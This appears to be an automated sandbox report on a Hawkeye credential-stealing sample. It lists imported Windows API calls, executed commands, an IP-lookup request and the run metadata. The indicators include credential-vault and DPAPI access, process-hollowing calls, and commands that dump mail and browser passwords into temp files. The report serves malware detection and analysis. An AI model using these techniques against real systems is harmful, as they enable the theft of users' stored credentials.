user32.dll.EndPaint
oleaut32.dll.SysStringLen
kernel32.dll.RtlZeroMemory
oleaut32.dll.#283
oleaut32.dll.#284
advapi32.dll.RegSetValueExW
kernel32.dll.SetFileAttributesW
kernel32.dll.GetSystemDefaultUILanguage
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
user32.dll.SetWindowsHookExA
kernel32.dll.FindFirstFileW
kernel32.dll.FindClose
kernel32.dll.FindNextFileW
user32.dll.SetForegroundWindow
ole32.dll.OleInitialize
ole32.dll.CoRegisterMessageFilter
user32.dll.SetFocus
user32.dll.GetWindowThreadProcessId
user32.dll.PostMessageW
user32.dll.PeekMessageW
user32.dll.IsWindowUnicode
user32.dll.GetMessageW
user32.dll.TranslateMessage
user32.dll.DispatchMessageW
user32.dll.WaitMessage
kernel32.dll.GetLogicalDrives
kernel32.dll.GetDriveTypeW
oleaut32.dll.#9
oleaut32.dll.#7
ntdll.dll.NtWriteVirtualMemory
ntdll.dll.NtGetContextThread
ntdll.dll.NtSetContextThread
ntdll.dll.NtResumeThread
kernel32.dll.GlobalMemoryStatusEx
advapi32.dll.CheckTokenMembership
mscoree.dll.DllGetClassObject
mscoreei.dll.DllGetClassObject
diasymreader.dll.DllGetClassObjectInternal
kernel32.dll.GetEnvironmentVariableW
vssapi.dll.CreateWriter
advapi32.dll.LookupAccountNameW
samcli.dll.NetLocalGroupGetMembers
samlib.dll.SamConnect
rpcrt4.dll.NdrClientCall3
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingFree
samlib.dll.SamOpenDomain
samlib.dll.SamLookupNamesInDomain
samlib.dll.SamOpenAlias
samlib.dll.SamFreeMemory
samlib.dll.SamCloseHandle
samlib.dll.SamGetMembersInAlias
netutils.dll.NetApiBufferFree
samlib.dll.SamEnumerateDomainsInSamServer
samlib.dll.SamLookupDomainInSamServer
ole32.dll.StringFromCLSID
oleaut32.dll.#4
propsys.dll.VariantToPropVariant
wbemcore.dll.Reinitialize
wbemsvc.dll.DllGetClassObject
wbemsvc.dll.DllCanUnloadNow
authz.dll.AuthzInitializeContextFromToken
authz.dll.AuthzInitializeObjectAccessAuditEvent2
authz.dll.AuthzAccessCheck
authz.dll.AuthzFreeAuditEvent
authz.dll.AuthzFreeContext
authz.dll.AuthzInitializeResourceManager
authz.dll.AuthzFreeResourceManager
rpcrt4.dll.RpcBindingCreateW
rpcrt4.dll.RpcBindingBind
rpcrt4.dll.I_RpcMapWin32Status
advapi32.dll.EventWrite
kernel32.dll.RegSetValueExW
wmisvc.dll.IsImproperShutdownDetected
wevtapi.dll.EvtRender
wevtapi.dll.EvtNext
wevtapi.dll.EvtClose
wevtapi.dll.EvtQuery
wevtapi.dll.EvtCreateRenderContext
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.RpcBindingSetOption
advapi32.dll.RegCreateKeyExW
kernelbase.dll.InitializeAcl
kernelbase.dll.AddAce
sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
kernel32.dll.IsThreadAFiber
kernel32.dll.OpenProcessToken
kernelbase.dll.GetTokenInformation
kernelbase.dll.DuplicateTokenEx
kernelbase.dll.AdjustTokenPrivileges
kernel32.dll.SetThreadToken
kernelbase.dll.CheckTokenMembership
kernelbase.dll.AllocateAndInitializeSid
ole32.dll.CLSIDFromString
oleaut32.dll.#285
advapi32.dll.RegOpenKeyW
oleaut32.dll.#12
oleaut32.dll.#286
oleaut32.dll.#17
oleaut32.dll.#20
oleaut32.dll.#19
oleaut32.dll.#25
authz.dll.AuthzInitializeContextFromSid
ole32.dll.CoGetCallContext
ole32.dll.CoImpersonateClient
advapi32.dll.OpenThreadToken
ole32.dll.CoRevertToSelf
oleaut32.dll.#8
ole32.dll.CoSwitchCallContext
advapi32.dll.LogonUserExExW
sspicli.dll.LogonUserExExW
oleaut32.dll.#287
oleaut32.dll.#288
oleaut32.dll.#289
ntmarta.dll.GetMartaExtensionInterface
fastprox.dll.DllGetClassObject
fastprox.dll.DllCanUnloadNow
oleaut32.dll.#290
winbrand.dll.BrandingLoadString
security.dll.InitSecurityInterfaceW
cryptsp.dll.SystemFunction035
schannel.dll.SpUserModeInitialize
ntdll.dll.RtlInitUnicodeString
ntdll.dll.RtlFreeUnicodeString
ntdll.dll.NtSetSystemEnvironmentValue
ntdll.dll.NtQuerySystemEnvironmentValue
ntdll.dll.NtCreateFile
ntdll.dll.NtQueryDirectoryObject
ntdll.dll.NtQueryObject
ntdll.dll.NtOpenDirectoryObject
ntdll.dll.NtQueryInformationProcess
ntdll.dll.NtQueryInformationToken
ntdll.dll.NtOpenFile
ntdll.dll.NtClose
ntdll.dll.NtFsControlFile
ntdll.dll.NtQueryVolumeInformationFile
netapi32.dll.NetGroupEnum
netapi32.dll.NetGroupGetInfo
netapi32.dll.NetGroupSetInfo
netapi32.dll.NetLocalGroupGetInfo
netapi32.dll.NetLocalGroupSetInfo
netapi32.dll.NetGroupGetUsers
netapi32.dll.NetLocalGroupGetMembers
netapi32.dll.NetLocalGroupEnum
netapi32.dll.NetShareEnum
netapi32.dll.NetShareGetInfo
netapi32.dll.NetShareAdd
netapi32.dll.NetShareEnumSticky
netapi32.dll.NetShareSetInfo
netapi32.dll.NetShareDel
netapi32.dll.NetShareDelSticky
netapi32.dll.NetShareCheck
netapi32.dll.NetUserEnum
netapi32.dll.NetUserGetInfo
netapi32.dll.NetUserSetInfo
netapi32.dll.NetApiBufferFree
netapi32.dll.NetQueryDisplayInformation
netapi32.dll.NetServerSetInfo
netapi32.dll.NetServerGetInfo
netapi32.dll.NetGetDCName
netapi32.dll.NetWkstaGetInfo
netapi32.dll.NetGetAnyDCName
netapi32.dll.NetServerEnum
netapi32.dll.NetUserModalsGet
netapi32.dll.NetScheduleJobAdd
netapi32.dll.NetScheduleJobDel
netapi32.dll.NetScheduleJobEnum
netapi32.dll.NetScheduleJobGetInfo
netapi32.dll.NetUseGetInfo
netapi32.dll.NetEnumerateTrustedDomains
netapi32.dll.DsGetDcNameW
netapi32.dll.DsRoleGetPrimaryDomainInformation
netapi32.dll.DsRoleFreeMemory
netapi32.dll.NetRenameMachineInDomain
netapi32.dll.NetJoinDomain
netapi32.dll.NetUnjoinDomain
wkscli.dll.NetWkstaGetInfo
cscapi.dll.CscNetApiGetInterface
kernel32.dll.GetDiskFreeSpaceExW
kernel32.dll.GetVolumePathNameW
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.Process32First
kernel32.dll.Process32Next
kernel32.dll.Module32First
kernel32.dll.Module32Next
kernel32.dll.Heap32ListFirst
oleaut32.dll.#15
oleaut32.dll.#26
comctl32.dll.InitCommonControlsEx
shell32.dll.SHGetSpecialFolderPathA
pstorec.dll.PStoreCreateInstance
crypt32.dll.CryptUnprotectData
advapi32.dll.CredReadA
advapi32.dll.CredFree
advapi32.dll.CredDeleteA
advapi32.dll.CredEnumerateA
advapi32.dll.CredEnumerateW
wer.dll.WerReportCreate
wer.dll.WerReportSetParameter
wer.dll.WerReportAddFile
wer.dll.WerReportSetUIOption
wer.dll.WerReportSubmit
wer.dll.WerReportAddDump
wer.dll.WerReportCloseHandle
user32.dll.LoadStringW
advapi32.dll.RegGetValueW
user32.dll.GetThreadDesktop
user32.dll.GetUserObjectInformationW
sensapi.dll.IsNetworkAlive
rpcrt4.dll.NdrClientCall2
user32.dll.CharUpperW
werui.dll.WerUICreate
werui.dll.WerUIStart
ole32.dll.CoInitialize
dui70.dll.InitProcessPriv
comctl32.dll.LoadIconWithScaleDown
ntdll.dll.RtlRunEncodeUnicodeString
ntdll.dll.RtlRunDecodeUnicodeString
dui70.dll.InitThread
duser.dll.InitGadgets
user32.dll.RegisterMessagePumpHook
dui70.dll.?GetClassInfoPtr@CCBase@DirectUI@@SGPAUIClassInfo@2@XZ
dui70.dll.?GetFactoryLock@Element@DirectUI@@SGPAU_RTL_CRITICAL_SECTION@@XZ
dui70.dll.??0CritSecLock@DirectUI@@QAE@PAU_RTL_CRITICAL_SECTION@@@Z
dui70.dll.?ClassExist@ClassInfoBase@DirectUI@@SG_NPAPAUIClassInfo@2@PBQBUPropertyInfo@2@IPAU32@PAUHINSTANCE__@@PBG_N@Z
dui70.dll.??0ClassInfoBase@DirectUI@@QAE@XZ
dui70.dll.?Initialize@ClassInfoBase@DirectUI@@QAEJPAUHINSTANCE__@@PBG_NPBQBUPropertyInfo@2@I@Z
dui70.dll.?Register@ClassInfoBase@DirectUI@@QAEJXZ
dui70.dll.?IsGlobal@ClassInfoBase@DirectUI@@UBE_NXZ
dui70.dll.?GetName@ClassInfoBase@DirectUI@@UBEPBGXZ
dui70.dll.?GetModule@ClassInfoBase@DirectUI@@UBEPAUHINSTANCE__@@XZ
dui70.dll.??1CritSecLock@DirectUI@@QAE@XZ
dui70.dll.??0CCBase@DirectUI@@QAE@KPBG@Z
dui70.dll.?Initialize@CCBase@DirectUI@@QAEJIPAVElement@2@PAK@Z
duser.dll.CreateGadget
duser.dll.SetGadgetMessageFilter
duser.dll.SetGadgetStyle
dui70.dll.?OnPropertyChanging@Element@DirectUI@@UAE_NPBUPropertyInfo@2@HPAVValue@2@1@Z
dui70.dll.?HandleUiaPropertyChangingListener@Element@DirectUI@@UAEXPBUPropertyInfo@2@@Z
dui70.dll.?HandleUiaPropertyListener@Element@DirectUI@@UAEXPBUPropertyInfo@2@HPAVValue@2@1@Z
dui70.dll.?DirectionProp@Element@DirectUI@@SGPBUPropertyInfo@2@XZ
dui70.dll.?OnPropertyChanged@CCBase@DirectUI@@UAEXPBUPropertyInfo@2@HPAVValue@2@1@Z
dui70.dll.?SetFontSize@Element@DirectUI@@QAEJH@Z
dui70.dll.?SetWidth@Element@DirectUI@@QAEJH@Z
dui70.dll.?SetHeight@Element@DirectUI@@QAEJH@Z
dui70.dll.?EndDefer@Element@DirectUI@@QAEXK@Z
dui70.dll.?OnGroupChanged@Element@DirectUI@@UAEXH_N@Z
duser.dll.InvalidateGadget
dui70.dll.CreateDUIWrapper
dui70.dll.?SetNotifyHandler@CCBase@DirectUI@@QAEXP6GHIIJPAJPAX@Z1@Z
shell32.dll.ExtractIconExW
comctl32.dll.TaskDialogIndirect
uxtheme.dll.IsThemeActive
duser.dll.SetGadgetRootInfo
uxtheme.dll.GetThemeAppProperties
xmllite.dll.CreateXmlReader
xmllite.dll.CreateXmlReaderInputWithEncodingName
uxtheme.dll.OpenThemeData
uxtheme.dll.GetThemeMargins
uxtheme.dll.GetThemeFont
uxtheme.dll.GetThemeColor
uxtheme.dll.GetThemeMetric
duser.dll.SetGadgetParent
duser.dll.GetDUserModule
duser.dll.FindStdColor
duser.dll.AttachWndProcW
kernel32.dll.InterlockedPopEntrySList
kernel32.dll.InterlockedPushEntrySList
kernel32.dll.InterlockedCompareExchange
comctl32.dll.RegisterClassNameW
duser.dll.GetGadgetRect
duser.dll.GetGadgetRgn
duser.dll.GetGadgetTicket
gdi32.dll.GetLayout
gdi32.dll.GdiRealizationInfo
gdi32.dll.FontIsLinked
gdi32.dll.GetTextFaceAliasW
gdi32.dll.GetFontAssocStatus
advapi32.dll.RegQueryValueExA
dui70.dll.?GetPICount@ClassInfoBase@DirectUI@@UBEIXZ
dui70.dll.?GetByClassIndex@ClassInfoBase@DirectUI@@UAEPBUPropertyInfo@2@I@Z
dui70.dll.?OnHosted@HWNDHost@DirectUI@@MAEXPAVElement@2@@Z
dui70.dll.?CreateAccNameLabel@HWNDHost@DirectUI@@IAEPAUHWND__@@PAU3@@Z
uxtheme.dll.EnableThemeDialogTexture
dui70.dll.?OnMessage@HWNDHost@DirectUI@@UAE_NIIJPAJ@Z
dui70.dll.?CreateHWND@CCBase@DirectUI@@UAEPAUHWND__@@PAU3@@Z
comctl32.dll.HIMAGELIST_QueryInterface
comctl32.dll.DrawShadowText
comctl32.dll.DrawSizeBox
comctl32.dll.DrawScrollBar
comctl32.dll.SizeBoxHwnd
comctl32.dll.ScrollBar_MouseMove
comctl32.dll.ScrollBar_Menu
comctl32.dll.HandleScrollCmd
comctl32.dll.DetachScrollBars
comctl32.dll.AttachScrollBars
comctl32.dll.CCSetScrollInfo
comctl32.dll.CCGetScrollInfo
comctl32.dll.CCEnableScrollBar
comctl32.dll.QuerySystemGestureStatus
uxtheme.dll.#49
uxtheme.dll.CloseThemeData
dui70.dll.?PostCreate@CCBase@DirectUI@@MAEXPAUHWND__@@@Z
dui70.dll.?IsContentProtected@Element@DirectUI@@UAE_NXZ
uxtheme.dll.GetThemeBool
duser.dll.GetGadgetFocus
uxtheme.dll.GetThemeBackgroundContentRect
uxtheme.dll.GetThemeTextMetrics
uxtheme.dll.GetThemePartSize
uxtheme.dll.GetThemeTextExtent
uxtheme.dll.GetThemeBackgroundExtent
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoRevokeInitializeSpy
duser.dll.SetGadgetFocus
duser.dll.DUserSendEvent
duser.dll.SetGadgetRect
comctl32.dll.SetWindowSubclass
comctl32.dll.DefSubclassProc
dui70.dll.?GetHWND@HWNDHost@DirectUI@@UAEPAUHWND__@@XZ
user32.dll.FrostCrashedWindow
uxtheme.dll.#47
uxtheme.dll.BufferedPaintInit
uxtheme.dll.BeginBufferedPaint
uxtheme.dll.BufferedPaintRenderAnimation
uxtheme.dll.BeginBufferedAnimation
uxtheme.dll.IsThemeBackgroundPartiallyTransparent
uxtheme.dll.DrawThemeParentBackground
uxtheme.dll.DrawThemeBackground
uxtheme.dll.DrawThemeText
uxtheme.dll.EndBufferedAnimation
uxtheme.dll.GetThemeTransitionDuration
uxtheme.dll.GetBufferedPaintDC
uxtheme.dll.GetBufferedPaintTargetDC
uxtheme.dll.EndBufferedPaint
duser.dll.ForwardGadgetMessage
oleaut32.dll.SysAllocString
oleaut32.dll.SysFreeString
uxtheme.dll.GetThemeInt
duser.dll.DUserPostEvent
duser.dll.DisableContainerHwnd
uxtheme.dll.BufferedPaintUnInit
werui.dll.WerUIUpdateUIForState
duser.dll.DeleteHandle
duser.dll.DetachWndProc
comctl32.dll.RemoveWindowSubclass
dui70.dll.?OnUnHosted@HWNDHost@DirectUI@@MAEXPAVElement@2@@Z
dui70.dll.?MessageCallback@HWNDHost@DirectUI@@UAEIPAUtagGMSG@@@Z
dui70.dll.?HandleUiaDestroyListener@Element@DirectUI@@UAEXXZ
dui70.dll.?OnDestroy@HWNDHost@DirectUI@@UAEXXZ
uxtheme.dll.BufferedPaintStopAllAnimations
dui70.dll.??1CCBase@DirectUI@@UAE@XZ
uxtheme.dll.DrawThemeParentBackgroundEx
uxtheme.dll.GetThemeEnumValue
user32.dll.MsgWaitForMultipleObjects
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpSetStatusCallback
winhttp.dll.WinHttpGetDefaultProxyConfiguration
winhttp.dll.WinHttpGetProxyForUrl
winhttp.dll.WinHttpSendRequest
ws2_32.dll.GetAddrInfoW
ws2_32.dll.#2
ws2_32.dll.#21
ws2_32.dll.#9
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.#6
ws2_32.dll.#5
ws2_32.dll.WSARecv
ws2_32.dll.WSASend
winhttp.dll.WinHttpReceiveResponse
winhttp.dll.WinHttpQueryHeaders
winhttp.dll.WinHttpReadData
ws2_32.dll.#22
ws2_32.dll.#3
winhttp.dll.WinHttpCloseHandle
advapi32.dll.IsValidSid
advapi32.dll.GetLengthSid
advapi32.dll.CopySid
advapi32.dll.RegisterEventSourceW
advapi32.dll.ReportEventW
advapi32.dll.DeregisterEventSource
werui.dll.WerUITerminate
werui.dll.WerUIDelete
duser.dll.DUserFlushMessages
duser.dll.DUserFlushDeferredMessages
dui70.dll.UnInitThread
user32.dll.UnregisterMessagePumpHook
dui70.dll.UnInitProcessPriv
dui70.dll.?Release@ClassInfoBase@DirectUI@@UAEHXZ
dui70.dll.?GetGlobalIndex@ClassInfoBase@DirectUI@@UBEIXZ
dui70.dll.??1ClassInfoBase@DirectUI@@UAE@XZ
advapi32.dll.DuplicateToken
shell32.dll.SHGetSpecialFolderPathW
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetInformation
vaultcli.dll.VaultGetItem
wersvc.dll.ServiceMain
wersvc.dll.SvchostPushServiceGlobals
faultrep.dll.WerpInitiateCrashReporting
wer.dll.WerpCreateMachineStore
shell32.dll.SHGetFolderPathEx
ole32.dll.StringFromGUID2
profapi.dll.#104
userenv.dll.CreateEnvironmentBlock
sechost.dll.ConvertSidToStringSidW
sspicli.dll.GetUserNameExW
userenv.dll.DestroyEnvironmentBlock
imm32.dll.ImmDisableIME
wer.dll.WerpCreateIntegratorReportId
wer.dll.WerpSetIntegratorReportId
dbgeng.dll.DebugCreate
ntdll.dll.CsrGetProcessId
ntdll.dll.DbgBreakPoint
ntdll.dll.DbgPrint
ntdll.dll.DbgPrompt
ntdll.dll.DbgUiConvertStateChangeStructure
ntdll.dll.DbgUiGetThreadDebugObject
ntdll.dll.DbgUiIssueRemoteBreakin
ntdll.dll.DbgUiSetThreadDebugObject
ntdll.dll.NtAllocateVirtualMemory
ntdll.dll.NtCreateDebugObject
ntdll.dll.NtDebugActiveProcess
ntdll.dll.NtDebugContinue
ntdll.dll.NtFreeVirtualMemory
ntdll.dll.NtOpenProcess
ntdll.dll.NtOpenThread
ntdll.dll.NtQueryMutant
ntdll.dll.NtRemoveProcessDebug
ntdll.dll.NtSetInformationDebugObject
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtSystemDebugControl
ntdll.dll.NtWaitForDebugEvent
ntdll.dll.RtlAnsiStringToUnicodeString
ntdll.dll.RtlCreateProcessParameters
ntdll.dll.RtlCreateUserProcess
ntdll.dll.RtlDestroyProcessParameters
ntdll.dll.RtlDosPathNameToNtPathName_U
ntdll.dll.RtlFindMessage
ntdll.dll.RtlFreeHeap
ntdll.dll.RtlGetUnloadEventTrace
ntdll.dll.RtlGetUnloadEventTraceEx
ntdll.dll.RtlInitAnsiString
ntdll.dll.RtlTryEnterCriticalSection
ntdll.dll.RtlUnicodeStringToAnsiString
ntdll.dll.NtOpenProcessToken
ntdll.dll.NtOpenThreadToken
kernel32.dll.CloseProfileUserMapping
kernel32.dll.DebugActiveProcessStop
kernel32.dll.DebugBreak
kernel32.dll.DebugBreakProcess
kernel32.dll.DebugSetProcessKillOnExit
kernel32.dll.Module32FirstW
kernel32.dll.Module32NextW
kernel32.dll.OpenThread
kernel32.dll.Process32FirstW
kernel32.dll.Process32NextW
kernel32.dll.ProcessIdToSessionId
kernel32.dll.SetProcessShutdownParameters
kernel32.dll.GetTimeZoneInformation
kernel32.dll.Wow64GetThreadSelectorEntry
advapi32.dll.CloseServiceHandle
advapi32.dll.ControlService
advapi32.dll.CreateServiceA
advapi32.dll.CreateServiceW
advapi32.dll.DeleteService
advapi32.dll.EnumServicesStatusExA
advapi32.dll.EnumServicesStatusExW
advapi32.dll.GetEventLogInformation
advapi32.dll.OpenSCManagerA
advapi32.dll.OpenSCManagerW
advapi32.dll.OpenServiceA
advapi32.dll.OpenServiceW
advapi32.dll.StartServiceA
advapi32.dll.StartServiceW
advapi32.dll.GetSidSubAuthority
advapi32.dll.GetSidSubAuthorityCount
version.dll.GetFileVersionInfoSizeExW
version.dll.GetFileVersionInfoExW
dbghelp.dll.WinDbgExtensionDllInit
dbghelp.dll.ExtensionApiVersion
wer.dll.WerpSetDynamicParameter
wer.dll.WerpSetCallBack
wer.dll.WerpAddRegisteredDataToReport
wer.dll.WerpFreeString
rpcrt4.dll.NdrAsyncClientCall
rpcrt4.dll.RpcAsyncCompleteCall
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
winhttp.dll.WinHttpQueryDataAvailable
cryptnet.dll.I_CryptNetSetUrlCacheFlushInfo
setupapi.dll.SetupIterateCabinetW
cabinet.dll.#20
cabinet.dll.#22
cabinet.dll.#23
sechost.dll.QueryServiceConfigA
rpcrt4.dll.RpcStringBindingComposeA
rpcrt4.dll.RpcBindingFromStringBindingA
rpcrt4.dll.RpcEpResolveBinding
rpcrt4.dll.RpcStringFreeA
bcryptprimitives.dll.GetHashInterface
crypt32.dll.CertVerifyCertificateChainPolicy
crypt32.dll.CertFreeCertificateChain
crypt32.dll.CertDuplicateCertificateContext
crypt32.dll.CertFreeCertificateContext
ncrypt.dll.SslDecrementProviderReferenceCount
ncrypt.dll.SslFreeObject

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.cmdline"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RES1B34.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC2813057F32DC41CFAF28AA7F3A2477F5.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Seven01\AppData\Local\Temp\holdermail.txt"
dw20.exe -x -s 1296
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Seven01\AppData\Local\Temp\holderwb.txt"
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\lsass.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1688

Started Services

VaultSvc
WerSvc

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05_64 Seven05_64 VirtualBox 2018-05-28 14:23:21 2018-05-28 14:26:27 186

2 HTTP Request(s) detected

http://whatismyipaddress.com/
  • Hostname: whatismyipaddress.com
  • IP Address: 104.16.19.96
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Host: whatismyipaddress.com
Connection: Keep-Alive

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
  • Hostname: www.download.windowsupdate.com
  • IP Address: 13.107.4.50
  • Port: 80
  • Count: 1

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 110400
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

#infosec #automation

TheSystem Itself @ 2018-05-27 18:20:31

Detected family: #Hawkeye

TheSystem Itself @ 2018-05-28 15:42:03